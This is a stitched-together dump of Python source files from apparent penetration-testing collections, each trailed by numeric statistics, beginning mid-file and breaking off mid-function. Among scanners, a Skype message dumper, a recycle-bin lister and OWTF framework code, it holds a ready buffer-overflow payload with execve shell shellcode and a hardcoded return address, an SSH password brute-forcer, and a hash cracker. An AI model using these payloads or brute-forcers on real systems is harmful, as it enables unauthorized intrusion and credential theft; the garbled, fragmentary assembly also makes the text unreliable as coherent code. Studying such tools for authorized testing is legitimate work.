' | Partner: '+ str(row[1])
def printMessages(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT datetime(timestamp,'unixepoch'), \
dialog_partner, author, body_xml FROM Messages;")
print '\n[*] -- Found Messages --'
for row in c:
try:
if 'partlist' not in str(row[3]):
if str(row[1]) != str(row[2]):
msgDirection = 'To ' + str(row[1]) + ': '
else:
msgDirection = 'From ' + str(row[2]) + ' : '
print 'Time: ' + str(row[0]) + ' ' \
+ msgDirection + str(row[3])
except:
pass
def main():
parser = optparse.OptionParser("usage %prog "+\
"-p <skype profile path> ")
parser.add_option('-p', dest='pathName', type='string',\
help='specify skype profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
elif os.path.isdir(pathName) == False:
print '[!] Path Does Not Exist: ' + pathName
exit(0)
else:
skypeDB = os.path.join(pathName, 'main.db')
if os.path.isfile(skypeDB):
printProfile(skypeDB)
printContacts(skypeDB)
printCallLog(skypeDB)
printMessages(skypeDB)
else:
print '[!] Skype Database '+\
'does not exist: ' + skpeDB
if __name__ == '__main__':
main()
| 29.201923 | 65 | 0.515924 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: April 2015
Name: headrequest.py
Purpose: To identify live web applications out extensive IP ranges
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2, argparse, sys
def host_test(filename):
    """Probe each host listed in *filename* over HTTP and HTTPS using HEAD
    requests and append all response headers to headrequests.log."""
    file = "headrequests.log"
    bufsize = 0
    e = open(file, 'a', bufsize)
    print("[*] Reading file %s") % (file)
    with open(filename) as f:
        hostlist = f.readlines()
    for host in hostlist:
        # Bug fix: readlines() keeps the trailing newline, which previously
        # produced malformed URLs like "http://example.com\n".
        host = host.strip()
        print("[*] Testing %s") % (str(host))
        target = "http://" + host
        target_secure = "https://" + host
        try:
            request = urllib2.Request(target)
            request.get_method = lambda : 'HEAD'
            response = urllib2.urlopen(request)
        except:
            print("[-] No web server at %s") % (str(target))
            response = None
        if response != None:
            print("[*] Response from %s") % (str(target))
            print(response.info())
            details = response.info()
            e.write(str(details))
        try:
            # Bug fix: the HTTPS branch used to call urlopen() on the URL
            # (a full GET) and then urlopen() again on the *response* object.
            # Build a Request and send a single HEAD, mirroring the HTTP branch.
            request_secure = urllib2.Request(target_secure)
            request_secure.get_method = lambda : 'HEAD'
            response_secure = urllib2.urlopen(request_secure)
        except:
            print("[-] No web server at %s") % (str(target_secure))
            response_secure = None
        if response_secure != None:
            print("[*] Response from %s") % (str(target_secure))
            print(response_secure.info())
            details = response_secure.info()
            e.write(str(details))
    e.close()
def main():
    """Parse CLI arguments and launch the HEAD-request probe."""
    # If script is executed at the CLI
    usage = '''usage: %(prog)s [-t hostfile] -q -v -vv -vvv'''
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument("-t", action="store", dest="targets", default=None, help="Filename for hosts to test")
    parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
    parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
    parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
    args = parser.parse_args()
    # Argument Validator
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    if (args.targets == None):
        parser.print_help()
        sys.exit(1)
    # Set Constructors
    verbose = args.verbose # Verbosity level
    targets = args.targets # File of hosts to probe
    host_test(targets)

if __name__ == '__main__':
    main()
| 41.354167 | 151 | 0.666667 |
owtf | """
tests.functional.cli.test_nowebui
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from tests.owtftest import OWTFCliTestCase
class OWTFCliNoWebUITest(OWTFCliTestCase):
    """Functional CLI test: OWTF must not start its web UI in no-UI mode."""

    categories = ["cli", "fast"]

    def test_cli_no_webui(self):
        """Run OWTF without its Web UI."""
        self.run_owtf()
        # The web-server startup line must be absent from the main process log.
        self.assert_has_not_been_logged(
            "Starting web server at http://127.0.0.1:8009",
            name="MainProcess",
            msg="The web UI should not have been run!",
        )
        # And OWTF must still shut down cleanly on SIGINT.
        self.assert_is_in_logs(
            "MainProcess: caught signal SIGINT, exiting",
            name="MainProcess",
            msg="OWTF did not finish properly!",
        )
| 25.192308 | 59 | 0.554412 |
owtf | """
owtf.requester.base
~~~~~~~~~~~~~~~~~~~
The Requester module is in charge of simplifying HTTP requests and
automatically log HTTP transactions by calling the DB module.
"""
import logging
import sys
try:
import http.client as client
except ImportError:
import httplib as client
try:
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from urllib.request import (
HTTPHandler,
HTTPSHandler,
HTTPRedirectHandler,
ProxyHandler,
build_opener,
install_opener,
)
except ImportError:
from urlparse import urlparse
from urllib import urlencode
from urllib2 import (
urlopen,
Request,
HTTPError,
HTTPHandler,
HTTPSHandler,
HTTPRedirectHandler,
ProxyHandler,
build_opener,
install_opener,
URLError,
)
from owtf.db.session import get_scoped_session
from owtf.transactions.base import HTTPTransaction
from owtf.managers.target import is_url_in_scope
from owtf.managers.transaction import get_first, is_transaction_already_added
from owtf.managers.url import is_url
from owtf.plugin.runner import runner
from owtf.settings import PROXY_CHECK_URL, USER_AGENT, INBOUND_PROXY_IP, INBOUND_PROXY_PORT
from owtf.utils.http import derive_http_method
from owtf.utils.strings import str_to_dict
from owtf.utils.timer import timer
from owtf.utils.error import abort_framework
__all__ = ["requester"]
# Intercept raw request trick from:
# http://stackoverflow.com/questions/6085709/get-headers-sent-in-urllib2-http-request
class _HTTPConnection(client.HTTPConnection):
    """HTTPConnection that records every raw chunk it sends into the
    module-global ``raw_request`` list before delegating to the real send().
    This is how Requester captures the exact request bytes on the wire."""

    def send(self, s):
        global raw_request
        # Saving to global variable for Requester class to see.
        raw_request.append(s)
        client.HTTPConnection.send(self, s)
class _HTTPHandler(HTTPHandler):
    """Opener handler that routes plain-HTTP requests through
    :class:`_HTTPConnection` so the raw request bytes get captured."""

    def http_open(self, req):
        try:
            return self.do_open(_HTTPConnection, req)
        except KeyboardInterrupt:
            # User interruption must propagate; it is handled elsewhere.
            raise
        except Exception:
            # A library failure (e.g. BadStatusLine) must not crash OWTF.
            return ""
class _HTTPSConnection(client.HTTPSConnection):
    """HTTPS twin of :class:`_HTTPConnection`: mirrors every sent chunk into
    the module-global ``raw_request`` list before actually sending it."""

    def send(self, s):
        global raw_request
        # Saving to global variable for Requester class to see.
        raw_request.append(s)
        client.HTTPSConnection.send(self, s)
class _HTTPSHandler(HTTPSHandler):
    """Opener handler that routes HTTPS requests through
    :class:`_HTTPSConnection` so the raw request bytes get captured."""

    def https_open(self, req):
        try:
            return self.do_open(_HTTPSConnection, req)
        except KeyboardInterrupt:
            # User interruption must propagate; it is handled elsewhere.
            raise
        except Exception:
            # A library failure (e.g. BadStatusLine) must not crash OWTF.
            return ""
# SmartRedirectHandler is courtesy of:
# http://www.diveintopython.net/http_web_services/redirects.html
class SmartRedirectHandler(HTTPRedirectHandler):
    """Redirect handler that preserves the original 301/302 status code on
    the returned response object as ``result.status``."""

    def http_error_301(self, req, fp, code, msg, headers):
        resp = HTTPRedirectHandler.http_error_301(self, req, fp, code, msg, headers)
        resp.status = code
        return resp

    def http_error_302(self, req, fp, code, msg, headers):
        resp = HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
        resp.status = code
        return resp
class Requester(object):
    """Sends OWTF's HTTP requests via urllib, captures the raw request bytes
    (through the module-level _HTTP*Connection/Handler classes and the global
    ``raw_request`` list) and optionally logs each transaction to the DB."""

    def __init__(self, proxy):
        # proxy: an (ip, port) pair for the outbound proxy, or None to
        # connect directly.
        self.http_transaction = None
        self.headers = {"User-Agent": USER_AGENT}
        self.req_count_refused = 0
        self.req_count_total = 0
        self.log_transactions = False
        self.timer = timer
        self.session = get_scoped_session()
        self.proxy = proxy
        if proxy is None:
            logging.debug(
                "WARNING: No outbound proxy selected. It is recommended to "
                "use an outbound proxy for tactical fuzzing later"
            )
            self.opener = build_opener(_HTTPHandler, _HTTPSHandler, SmartRedirectHandler)
        else:  # All requests must use the outbound proxy.
            logging.debug("Setting up proxy(inbound) for OWTF requests..")
            ip, port = proxy
            proxy_conf = {"http": "http://{!s}:{!s}".format(ip, port), "https": "http://{!s}:{!s}".format(ip, port)}
            proxy_handler = ProxyHandler(proxy_conf)
            # FIXME: Works except no raw request on https.
            self.opener = build_opener(proxy_handler, _HTTPHandler, _HTTPSHandler, SmartRedirectHandler)
        install_opener(self.opener)

    def is_transaction_added(self, url):
        """Checks if the transaction has already been added
        :param url: URL of the transaction
        :type url: `str`
        :return: True/False
        :rtype: `bool`
        """
        return is_transaction_already_added(self.session, {"url": url.strip()})

    def is_request_possible(self):
        """Check if requests are possible
        :return: True if yes, else False
        :rtype: `bool`
        """
        return runner.requests_possible()

    def proxy_check(self):
        """Checks if the target URL can be accessed through proxy
        .. note::
            Verify proxy works! www.google.com might not work in a restricted network, try target URL :)
        :return: Result of the check
        :rtype: `list`
        """
        if self.proxy is not None and self.is_request_possible():
            url = PROXY_CHECK_URL
            refused_before = self.req_count_refused
            logging.info("Proxy Check: Avoid logging request again if already in DB..")
            log_setting_backup = False
            if self.is_transaction_added(url):
                log_setting_backup = not self.log_transactions
            if log_setting_backup:
                self.log_transactions = True
            # NOTE(review): no request appears to be issued between the
            # before/after counters here, and log_transactions is never
            # restored from the backup — confirm the intended flow.
            refused_after = self.req_count_refused
            if refused_before < refused_after:  # Proxy is refusing connections.
                return [False, "ERROR: Proxy Check error: The proxy is not listening or is refusing connections"]
            else:
                return [True, "Proxy Check OK: The proxy appears to be working"]
        return [True, "Proxy Check OK: No proxy is setup or no HTTP requests will be made"]

    def get_headers(self):
        """Get headers
        :return: Headers
        :rtype: `dict`
        """
        return self.headers

    def set_headers(self, headers):
        """Set supplied headers
        :param headers: Headers to set
        :type headers: `dict`
        :return: None
        :rtype: None
        """
        self.headers = headers

    def set_header(self, header, value):
        """Set the value of header
        :param header: Header key
        :type header: `str`
        :param value: Value to be set
        :type value: `str`
        :return: None
        :rtype: None
        """
        self.headers[header] = value

    def get_post_to_str(self, post=None):
        """Convert POST req to str
        :param post: POST request
        :type post:
        :return: Resultant string
        :rtype: `str`
        """
        post = self.get_post(post)
        if post is None:
            return ""
        return post

    def get_post(self, post=None):
        """Get post request
        :param post: Post request
        :type post: `str`
        :return: Processed POST request
        :rtype: `str`
        """
        if "" == post:
            post = None
        if post:
            # NOTE(review): 'unicode' only exists on Python 2; on Python 3
            # this branch raises NameError for any non-str truthy post —
            # confirm whether py3 callers ever pass non-str data here.
            if isinstance(post, str) or isinstance(post, unicode):
                # Must be a dictionary prior to urlencode.
                post = str_to_dict(str(post))
            post = urlencode(post).encode("utf-8")
        return post

    def perform_request(self, request):
        """Send the request
        :param request: Request to send
        :type request:
        :return: None
        :rtype: None
        """
        return urlopen(request)

    def set_successful_transaction(self, raw_request, response):
        """Set a transaction from request and response
        :param raw_request: Raw request
        :type raw_request: `list`
        :param response: response
        :type response:
        :return: None
        :rtype: None
        """
        return self.http_transaction.set_transaction(True, raw_request[0], response)

    def log_transaction(self):
        """Log a transaction
        :return: None
        :rtype: None
        """
        self.http_transaction.log_transaction(self.http_transaction)

    def request(self, url, method=None, post=None):
        """Main request function
        :param url: Target URL
        :type url: `str`
        :param method: Method for the request
        :type method: `str`
        :param post: Post body
        :type post: `str` or None
        :return:
        :rtype:
        """
        # kludge: necessary to get around urllib2 limitations: Need this to get the exact request that was sent.
        global raw_request
        url = str(url)
        raw_request = []  # initialize raw request to blank list.
        post = self.get_post(post)
        method = derive_http_method(method, post)
        url = url.strip()  # Clean up URL.
        r = Request(url, post, self.headers)  # GET request.
        if method is not None:
            # kludge: necessary to do anything other that GET or POST with urllib2
            r.get_method = lambda: method
        # MUST create a new Transaction object each time so that lists of
        # transactions can be created and process at plugin-level
        # Pass the timer object to avoid instantiating each time.
        self.http_transaction = HTTPTransaction(self.timer)
        self.http_transaction.start(url, post, method, is_url_in_scope(url))
        self.req_count_total += 1
        try:
            response = self.perform_request(r)
            self.set_successful_transaction(raw_request, response)
        except HTTPError as error:  # page NOT found.
            # Error is really a response for anything other than 200 OK in urllib2 :)
            self.http_transaction.set_transaction(False, raw_request[0], error)
        except URLError as error:  # Connection refused?
            err_message = self.process_http_error_code(error, url)
            self.http_transaction.set_error(err_message)
        except IOError:
            err_message = "ERROR: Requester Object -> Unknown HTTP Request error: {!s}\n{!s}".format(
                url, str(sys.exc_info())
            )
            self.http_transaction.set_error(err_message)
        if self.log_transactions:
            # Log transaction in DB for analysis later and return modified Transaction with ID.
            self.log_transaction()
        return self.http_transaction

    def process_http_error_code(self, error, url):
        """Process HTTP error code
        :param error: Error
        :type error:
        :param url: Target URL
        :type url: `str`
        :return: Message
        :rtype: `str`
        """
        message = ""
        if str(error.reason).startswith("[Errno 111]"):
            message = "ERROR: The connection was refused!: {!s}".format(error)
            self.req_count_refused += 1
        elif str(error.reason).startswith("[Errno -2]"):
            # Unresolvable hostname is fatal for the whole framework run.
            abort_framework("ERROR: cannot resolve hostname!: {!s}".format(error))
        else:
            message = "ERROR: The connection was not refused, unknown error!"
        log = logging.getLogger("general")
        log.info(message)
        return "{!s} (Requester Object): {!s}\n{!s}".format(message, url, str(sys.exc_info()))

    def get(self, url):
        """Wrapper for get requests
        :param url: Target url
        :type url: `str`
        :return:
        :rtype:
        """
        return self.request(url)

    def post(self, url, data):
        """Wrapper for Post requests
        :param url: Target url
        :type url: `str`
        :param data: Post data
        :type data: `str`
        :return:
        :rtype:
        """
        return self.request(url, "POST", data)

    def trace(self, url):
        """Wrapper for trace requests
        :param url: Target url
        :type url: `str`
        :return:
        :rtype:
        """
        return self.request(url, "TRACE", None)

    def options(self, url):
        """Wrapper for options requests
        :param url: Target url
        :type url: `str`
        :return:
        :rtype:
        """
        return self.request(url, "OPTIONS", None)

    def head(self, url):
        """Wrapper for head requests
        :param url: Target url
        :type url: `str`
        :return:
        :rtype:
        """
        return self.request(url, "HEAD", None)

    def debug(self, url):
        """Debug request
        :param url: Target url
        :type url: `str`
        :return:
        :rtype:
        """
        # Temporarily add the DEBUG command header, then restore headers.
        self.backup_headers()
        self.headers["Command"] = "start-debug"
        result = self.request(url, "DEBUG", None)
        self.restore_headers()
        return result

    def put(self, url, content_type="text/plain"):
        """Wrapper for put requests
        :param url: Target url
        :type url: `str`
        :param content_type: Content Type
        :type content_type: `str`
        :return:
        :rtype:
        """
        # Temporarily set PUT-specific headers, then restore the originals.
        self.backup_headers()
        self.headers["Content-Type"] = content_type
        self.headers["Content-Length"] = "0"
        result = self.request(url, "PUT", None)
        self.restore_headers()
        return result

    def backup_headers(self):
        """Backup headers
        :return: None
        :rtype: None
        """
        self.headers_backup = dict.copy(self.headers)

    def restore_headers(self):
        """Restore headers
        :return: None
        :rtype: None
        """
        self.headers = dict.copy(self.headers_backup)

    def get_transaction(self, use_cache, url, method=None, data=None):
        """Get transaction from request, response
        :param use_cache: Cache usage
        :type use_cache: `bool`
        :param url: Request URL
        :type url: `str`
        :param method: Request method
        :type method: `str`
        :param data: Request data
        :type data: `str`
        :return:
        :rtype:
        """
        criteria = {"url": url.strip()}
        if method is not None:
            criteria["method"] = method
        # Must clean-up data to ensure match is found.
        if data is not None:
            criteria["data"] = self.get_post_to_str(data)
        # Visit URL if not already visited.
        if not use_cache or not is_transaction_already_added(self.session, criteria):
            if method in ["", "GET", "POST", "HEAD", "TRACE", "OPTIONS"]:
                return self.request(url, method, data)
            elif method == "DEBUG":
                return self.debug(url)
            elif method == "PUT":
                return self.put(url, data)
        else:  # Retrieve from DB = faster.
            # Important since there is no transaction ID with transactions objects created by Requester.
            return get_first(self.session, criteria)

    def get_transactions(self, use_cache, url_list, method=None, data=None, unique=True):
        """Get transaction from request, response
        :param use_cache: Cache usage
        :type use_cache: `bool`
        :param url_list: List of request URLs
        :type url_list: `list`
        :param method: Request method
        :type method: `str`
        :param data: Request data
        :type data: `str`
        :param unique: Unique or not
        :type unique: `bool`
        :return: List of transactions
        :rtype: `list`
        """
        transactions = []
        if unique:
            url_list = set(url_list)
        for url in url_list:
            url = url.strip()  # Clean up the URL first.
            if not url:
                continue  # Skip blank lines.
            if not is_url(url):
                logging.info("Minor issue: %s is not a valid URL and has been ignored, processing continues", url)
                continue  # Skip garbage URLs.
            transaction = self.get_transaction(use_cache, url, method=method, data=data)
            if transaction is not None:
                transactions.append(transaction)
        return transactions
requester = Requester(proxy=[INBOUND_PROXY_IP, INBOUND_PROXY_PORT])
| 31.449902 | 116 | 0.588339 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.6
import json,sys
class JsonParse:
    """Load, pretty-print and post-process an employee JSON document."""

    def __init__(self, json_):
        # Path of the JSON document this instance operates on.
        self.json = json_

    def _load(self):
        # Read and deserialize the whole document from disk.
        with open(self.json, "r") as handle:
            return json.loads(handle.read())

    def print_file(self):
        """Dump the department header and every employee record to stdout."""
        document = self._load()
        if not document:
            return
        print("Type of loaded File is :" + str(type(document)))
        employee_root = document.get("employees", None)
        if not employee_root:
            return
        print("Department : " + employee_root["department"])
        print("Location : " + employee_root["location"])
        print("Employees : ")
        for record in employee_root["data"]:
            print("\n--------------------------------")
            for key, value in record.items():
                print("\t" + str(key) + " : " + str(value))

    def process(self):
        """Assign a salary slab to every employee ("A" for >= 30000, "B"
        otherwise), save the document back to disk, then reprint it."""
        document = self._load()
        if not document:
            return
        print("\nSlab Processing started")
        for record in document["employees"]["data"]:
            record["slab"] = "A" if record["salary"] >= 30000 else "B"
        print("Slab Processing Ended \nSaving Results :")
        with open(self.json, "w") as handle:
            json.dump(document, handle, indent=4, sort_keys=True)
        print("Results saved \nNow reprinting : ")
        self.print_file()
# Script entry point: the JSON document path is the first CLI argument.
obj=JsonParse(sys.argv[1])
obj.print_file()
obj.process()
| 32.717949 | 62 | 0.620244 |
owtf | """
ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via Skipfish
This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active Vulnerability Scanning without credentials via Skipfish"
def run(PluginInfo):
    """Fetch the unauthenticated Skipfish resources and hand them to the
    command-dump plugin helper."""
    skipfish_resources = get_resources("Skipfish_Unauth")
    return plugin_helper.CommandDump("Test Command", "Output", skipfish_resources, PluginInfo, [])
| 35.642857 | 98 | 0.777344 |
Ethical-Hacking-Scripts | import hashlib, threading, time, sys
from optparse import OptionParser
from string import ascii_letters, digits, punctuation
from itertools import product
class Hashcracker:
    """Brute-forces a single hash either from a wordlist file or by
    generating candidate strings on the fly (itertools.product)."""

    def __init__(self, hash ,hashType, passfile, nofile, passdigits, combolist):
        self.start = time.time()  # used later to report elapsed time
        self.hash = hash
        self.stop = False
        self.logo()
        self.combolist = combolist  # character set for no-file brute forcing
        self.nofile = nofile
        self.passdigits = passdigits  # candidate length for no-file mode
        try:
            self.passlist = open(passfile, 'r')
        except:
            # A wordlist is only mandatory when not in no-file mode.
            if not self.nofile:
                print("[+] Password list provided is invalid.")
                sys.exit()
        self.checked = 0  # number of candidates tried so far
        # Map the requested algorithm name onto its hashlib constructor.
        if "md5" in hashType:
            self.hashtype = hashlib.md5
        elif "sha1" in hashType:
            self.hashtype = hashlib.sha1
        elif "sha224" in hashType:
            self.hashtype = hashlib.sha224
        elif "sha256" in hashType:
            self.hashtype = hashlib.sha256
        elif "sha384" in hashType:
            self.hashtype = hashlib.sha384
        elif "sha512" in hashType:
            self.hashtype = hashlib.sha512
        else:
            print("[+] Invalid hashing method.")
            sys.exit()
        # Run the cracking loop on a worker thread.
        if self.nofile:
            print("[+] The hash cracking may take time, depending on the length of the password.")
            self.crackit = threading.Thread(target=self.nofile_cracker)
        else:
            self.crackit = threading.Thread(target=self.cracker)
        self.crackit.start()

    def save_hash(self,hash,realdef):
        # Persist the cracked pair as "<hash>:<plaintext>" in <hash>.txt.
        file = open(hash+".txt","w")
        file.write(f"{hash}:{realdef}")
        file.close()

    def logo(self):
        print("""
 ___ ___ .__ _________ .__ .___ ________ _______
/ | \_____ _____| |__ / _____/ ________ __|__| __| _/ ___ _\_____ \ \ _ \
/ ~ \__ \ / ___/ | \ \_____ \ / ____/ | \ |/ __ | \ \/ // ____/ / /_\ \
\ Y // __ \_\___ \| Y \/ < <_| | | / / /_/ | \ // \ \ \_/ \\
 \___|_ /(____ /____ >___| /_______ /\__ |____/|__\____ | \_/ \_______ \ /\ \_____ /
 \/ \/ \/ \/ \/ |__| \/ \/ \/ \/
 Hash-Cracker by DrSquid""")

    def display_packet(self, hash, string):
        # Build the success report shown when a candidate matches.
        end = time.time()
        return f"""[!] Hash has been cracked!
[!] Hash: {hash} String: {string.strip()}
[!] Passwords checked: {self.checked}
[!] Time elapsed: {end - self.start}"""

    def nofile_cracker(self):
        """Generate every combination of self.combolist characters of length
        self.passdigits and compare its digest against the target hash."""
        success = False
        for passcode in product(self.combolist, repeat=self.passdigits):
            new_passcode = ""
            for i in passcode:
                new_passcode += i
            if str(self.hashtype(new_passcode.encode()).hexdigest()) == self.hash:
                success = True
                print(self.display_packet(self.hash, new_passcode))
                self.save_hash(self.hash,new_passcode)
                input("[!] Press enter to exit.")
                break
            else:
                self.checked += 1
        if not success:
            print(f"[?] Unable to crack Hash: {self.hash}")

    def cracker(self):
        """Hash each wordlist line and compare it against the target hash."""
        success = False
        while True:
            try:
                for line in self.passlist:
                    if self.hashtype(line.strip().encode()).hexdigest() == self.hash:
                        print(self.display_packet(self.hash, line.strip()))
                        self.save_hash(self.hash,line.strip())
                        success = True
                        input("[!] Press enter to exit.")
                        break
                    else:
                        self.checked += 1
                if not success:
                    print(f"[?] Unable to crack Hash: {self.hash}")
                    break
            except Exception as e:
                pass
class OptionParse:
    """Parse HashSquid's command-line options and launch a Hashcracker."""

    def __init__(self):
        # At least a hash and one more option are required.
        if len(sys.argv) < 3:
            self.usage()
        else:
            self.get_args()

    def usage(self):
        """Print the banner and option help."""
        Hashcracker.logo(None)
        print("""
[+] Option-Parsing Help:
[+] --h, --hash - Specifies the Hash to crack.
[+] --hT, --hashtype - Specifies Hash type(default is md5).
[+] With Brute Force File:
[+] --pL, --passlist - Specifies the Brute Forcing TxT File.
[+] Without Brute Force File:
[+] --nF, --nofile - Makes the script use computing power rather than a txt file to crack a hash.
[+] --pD, --passdigits - Specify the amount of digits the password contains(default is 6).
[+] --oL, --onlyletters - Makes the no file brute forcing brute force through only letter passwords.
[+] --oN, --onlynumbers - Makes the no file brute forcing brute force through only number passwords.
[+] Optional Arguements:
[+] --i, --info - Shows this message.
[+] Usage:""")
        if sys.argv[0].endswith(".py"):
            print("[+] python3 HashSquid.py --h <hash> --hT <hashtype> --pL <passlist>")
            print("[+] python3 HashSquid.py --i")
        else:
            print("[+] HashSquid --h <hash> --hT <hashtype> --pL <passlist>")
            print("[+] HashSquid --i")

    def get_args(self):
        """Parse the options and start the cracker when they are valid."""
        self.opts = OptionParser()
        self.opts.add_option("--h","--hash",dest="hash")
        self.opts.add_option("--hT","--hashtype",dest="hashtype")
        self.opts.add_option("--pL","--passlist",dest="passlist")
        self.opts.add_option("--nF","--nofile",dest="nofile", action="store_true")
        self.opts.add_option("--pD","--passdigits",dest="passdigits")
        self.opts.add_option("--oL","--onlyletters",dest="onlyletters", action="store_true")
        self.opts.add_option("--oN","--onlynumbers",dest="onlynumbers", action="store_true")
        self.opts.add_option("--i","--info",dest="info",action="store_true")
        args, opt = self.opts.parse_args()
        if args.info is not None:
            # Bug fix: execution previously fell through after printing help
            # and crashed later on unset variables.
            self.usage()
            return
        if args.hash is None:
            # Bug fix: 'hash' used to be referenced below even when unset.
            self.usage()
            return
        hash = args.hash
        if args.hashtype is None:
            hashtype = "md5"
        else:
            hashtype = args.hashtype
        nofile = args.nofile is not None
        # Bug fix: passdigits is now always bound. It used to be left
        # undefined when cracking from a wordlist without --pD, raising
        # NameError at the Hashcracker call below.
        passdigits = 6
        if args.passdigits is not None:
            try:
                passdigits = int(args.passdigits)
            except:
                passdigits = 6
        if args.onlyletters is not None:
            combolist = ascii_letters
        elif args.onlynumbers is not None:
            combolist = digits
        else:
            combolist = ascii_letters+digits+punctuation
        # Bug fix: passlist is likewise always bound (None = "no wordlist"),
        # and a missing mandatory wordlist now stops after printing usage.
        passlist = None
        if args.passlist is None:
            if not nofile:
                self.usage()
                return
        else:
            passlist = args.passlist
        HashSquid = Hashcracker(hash, hashtype, passlist, nofile, passdigits, combolist)
optionparser = OptionParse()
| 40.090909 | 103 | 0.486931 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import optparse
from _winreg import *
def sid2user(sid):
    """Resolve a Windows SID to a username via the ProfileList registry key;
    falls back to returning the SID string itself on any failure."""
    try:
        key = OpenKey(HKEY_LOCAL_MACHINE,
            "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList"
            + '\\' + sid)
        (value, type) = QueryValueEx(key, 'ProfileImagePath')
        # The profile path ends with the account name, e.g. C:\Users\alice.
        user = value.split('\\')[-1]
        return user
    except:
        return sid
def returnDir():
    """Return the first Windows Recycle Bin directory present on C:,
    or None when no known variant exists."""
    candidates = ['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\\']
    for candidate in candidates:
        if os.path.isdir(candidate):
            return candidate
    return None
def findRecycled(recycleDir):
    """List every file in each per-SID subdirectory of the Recycle Bin,
    printing the owning user (resolved from the SID) above its files."""
    dirList = os.listdir(recycleDir)
    for sid in dirList:
        files = os.listdir(recycleDir + sid)
        user = sid2user(sid)
        print '\n[*] Listing Files For User: ' + str(user)
        for file in files:
            print '[+] Found File: ' + str(file)
def main():
recycledDir = returnDir()
findRecycled(recycledDir)
if __name__ == '__main__':
main()
| 21.043478 | 65 | 0.581441 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *

# Exploit payload layout: NOP sled + execve("/bin//sh") shellcode + saved-RIP
# overwrite (little-endian 64-bit stack address).
buffer = b''
buffer += b'\x90'*232  # NOP sled
# 32-byte x86-64 shellcode. Bug fix: the literal was split onto its own lines
# after 'buffer +=', which is a SyntaxError; it is now one bytes literal
# (bytes also keep pack()'s return type compatible on Python 3).
buffer += b'\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05'
buffer += pack("<Q", 0x7fffffffe2c0)  # return address into the NOP sled
f = open("input.txt", "wb")  # binary mode so raw bytes survive on Python 3
f.write(buffer) | 25.818182 | 75 | 0.676871 |
Effective-Python-Penetration-Testing | from w3af_api_client import Connection, Scan
# Connect to a locally running w3af REST API instance.
connection = Connection('http://127.0.0.1:5000/')
print connection.get_version()
# Scan profile (what to test) and the target list.
profile = file('w3af/profiles/OWASP_TOP10.pw3af').read()
target = ['http://localhost']
# Start the scan and pull its artifacts: discovered URLs, log, findings,
# and fuzzable requests.
scan = Scan(connection)
scan.start(profile, target)
scan.get_urls()
scan.get_log()
scan.get_findings()
scan.get_fuzzable_requests()
| 20.875 | 56 | 0.733524 |
cybersecurity-penetration-testing | #!/usr/bin/python
import paramiko, sys, os, socket, threading, time
import itertools,string,crypt
PASS_SIZE = 5
def bruteforce_list(charset, maxlength):
    """Lazily yield every candidate string over *charset* of length
    1..maxlength, shortest candidates first."""
    for length in range(1, maxlength + 1):
        for combo in itertools.product(charset, repeat=length):
            yield ''.join(combo)
def attempt(Password):
    """Try one SSH login against the hard-coded host with *Password* and
    print the outcome. Runs on its own thread."""
    IP = "127.0.0.1"
    USER = "rejah"
    PORT=22
    try:
        ssh = paramiko.SSHClient()
        ssh.load_system_host_keys()
        # Accept unknown host keys so the attempt never blocks on a prompt.
        ssh.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy())
        try:
            ssh.connect(IP , port=PORT, username=USER, password=Password)
            print "Connected successfully. Password = "+Password
        except paramiko.AuthenticationException, error:
            print "Incorrect password: "+Password
            pass
        except socket.error, error:
            print error
            pass
        except paramiko.SSHException, error:
            print error
            print "Most probably this is caused by a missing host key"
            pass
        except Exception, error:
            print "Unknown error: "+error
